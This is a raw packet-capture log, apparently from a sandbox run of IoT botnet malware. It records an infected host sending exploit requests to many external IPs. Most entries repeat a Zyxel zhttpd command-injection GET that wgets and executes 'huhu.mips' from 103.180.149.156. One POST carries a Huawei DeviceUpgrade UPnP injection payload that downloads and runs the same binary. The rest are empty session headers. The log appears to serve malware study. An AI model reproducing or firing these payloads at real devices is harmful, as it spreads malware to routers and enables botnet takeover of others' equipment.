                                            Feb 2, 2024 06:21:33.054246902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9737192.168.2.1534572218.140.194.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054287910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9738192.168.2.1560790173.96.230.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054325104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9739192.168.2.153734650.168.105.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054364920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9740192.168.2.1537456219.44.3.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054399014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9741192.168.2.154735690.255.154.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054433107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9742192.168.2.1543480125.163.239.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054491997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9743192.168.2.15471124.129.242.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054538012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9744192.168.2.153536472.140.61.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054572105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9745192.168.2.1538628184.129.246.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054615021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9746192.168.2.1550864189.187.17.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054655075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9747192.168.2.1538804124.79.17.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054687023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9748192.168.2.153551653.201.213.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054728985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9749192.168.2.1537966190.50.255.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054757118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9750192.168.2.155797059.13.75.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054815054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9751192.168.2.155087690.63.11.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054848909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9752192.168.2.1554744107.247.8.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.054887056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9753192.168.2.155694835.186.244.3937215
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:33.721154928 CET841OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Content-Length: 472
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9754192.168.2.1546062213.176.226.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067362070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9755192.168.2.1536784146.173.216.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067375898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9756192.168.2.156081850.240.67.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067409992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9757192.168.2.155644212.131.74.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067460060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9758192.168.2.1558918149.177.2.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067507982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9759192.168.2.155041069.240.137.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067542076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9760192.168.2.1538610163.135.53.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067580938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9761192.168.2.153932060.239.50.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067629099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9762192.168.2.1549152120.162.39.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067672968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9763192.168.2.1543904128.57.132.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:34.067708969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9764192.168.2.1546528141.79.242.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9765192.168.2.1549322145.3.110.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9766192.168.2.154378863.102.229.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9767192.168.2.1559956161.177.232.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9768192.168.2.1553796114.253.151.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9769192.168.2.1556100132.210.4.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9770192.168.2.1546568141.195.177.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9771192.168.2.1559722213.200.159.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9772192.168.2.1534410184.200.21.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9773192.168.2.155377257.10.199.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9774192.168.2.154272867.76.254.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9775192.168.2.1540800107.215.202.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9776192.168.2.154082878.220.232.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9777192.168.2.155726217.167.29.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9778192.168.2.1549870165.141.40.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9779192.168.2.1533092112.219.106.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9780192.168.2.154052463.130.12.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9781192.168.2.1535268205.180.74.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9782192.168.2.1556626136.195.109.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9783192.168.2.153402469.39.184.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9784192.168.2.1550042107.28.119.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9785192.168.2.1558546152.161.104.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9786192.168.2.1538250131.93.176.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9787192.168.2.155271432.80.59.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9788192.168.2.1543032220.0.238.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9789192.168.2.1536176131.36.18.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9790192.168.2.154130091.44.16.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9791192.168.2.1544814190.99.230.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9792192.168.2.1553892160.145.99.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9793192.168.2.1535782170.4.253.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9794192.168.2.1539796173.167.32.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9795192.168.2.1547032167.76.62.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9796192.168.2.155419625.105.121.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9797192.168.2.154722424.102.96.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9798192.168.2.1552338121.47.227.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9799192.168.2.154430841.80.36.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9800192.168.2.1555434174.171.60.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9801192.168.2.1557170124.194.85.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9802192.168.2.1538570183.54.68.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9803192.168.2.1550776120.218.13.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9804192.168.2.155608678.8.6.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9805192.168.2.1551604187.180.146.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9806192.168.2.153833099.27.61.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9807192.168.2.155385490.130.170.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9808192.168.2.153953653.156.100.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9809192.168.2.1541510143.175.163.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9810192.168.2.153947427.196.251.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9811192.168.2.155234290.66.137.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9812192.168.2.15449821.204.52.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9813192.168.2.1546236217.81.227.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9814192.168.2.154517251.166.80.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9815192.168.2.1554254217.17.27.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9816192.168.2.1559400167.34.61.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9817192.168.2.153867660.30.59.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9818192.168.2.1555418120.213.40.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9819192.168.2.1560194184.4.129.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9820192.168.2.1553984113.191.218.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9821192.168.2.154889471.255.175.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9822192.168.2.1549554213.245.109.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9823192.168.2.154396269.22.104.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9824192.168.2.154027657.217.233.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9825192.168.2.1538386157.12.108.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9826192.168.2.1534430144.50.134.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9827192.168.2.155230497.17.140.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9828192.168.2.153803419.57.162.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9829192.168.2.15556181.24.48.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9830192.168.2.1543680188.171.197.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9831192.168.2.154228866.44.130.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9832192.168.2.1536104218.31.94.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9833192.168.2.1533160111.82.111.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9834192.168.2.156070268.254.24.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9835192.168.2.1542514168.7.1.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9836192.168.2.153514268.161.15.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9837192.168.2.1557516144.78.242.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9838192.168.2.153413238.191.132.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9839192.168.2.1550414118.27.22.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9840192.168.2.1553098125.215.60.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9841192.168.2.1542058206.87.156.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9842192.168.2.155136671.51.204.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9843192.168.2.1555582115.223.219.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9844192.168.2.1560142103.236.148.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9845192.168.2.155908090.117.217.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9846192.168.2.155697865.239.222.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9847192.168.2.155496846.182.21.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9848192.168.2.1557652161.39.52.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9849192.168.2.1551402199.24.185.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9850192.168.2.1539788136.224.122.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9851192.168.2.153819268.219.121.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9852192.168.2.155175027.168.82.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9853192.168.2.1541980198.85.157.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9854192.168.2.1541164199.150.118.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9855192.168.2.1534820145.183.236.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9856192.168.2.1548616192.33.195.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9857192.168.2.15422302.244.131.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9858192.168.2.1548818196.163.86.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9859192.168.2.155848236.24.17.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9860192.168.2.1545972217.170.231.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9861192.168.2.1559610201.76.67.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9862192.168.2.153379281.196.62.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9863192.168.2.154744095.49.16.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9864192.168.2.1560922168.47.252.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9865192.168.2.154282092.118.81.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9866192.168.2.1551166204.199.250.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9867192.168.2.1546476150.168.231.255443
                                            TimestampBytes transferredDirectionData


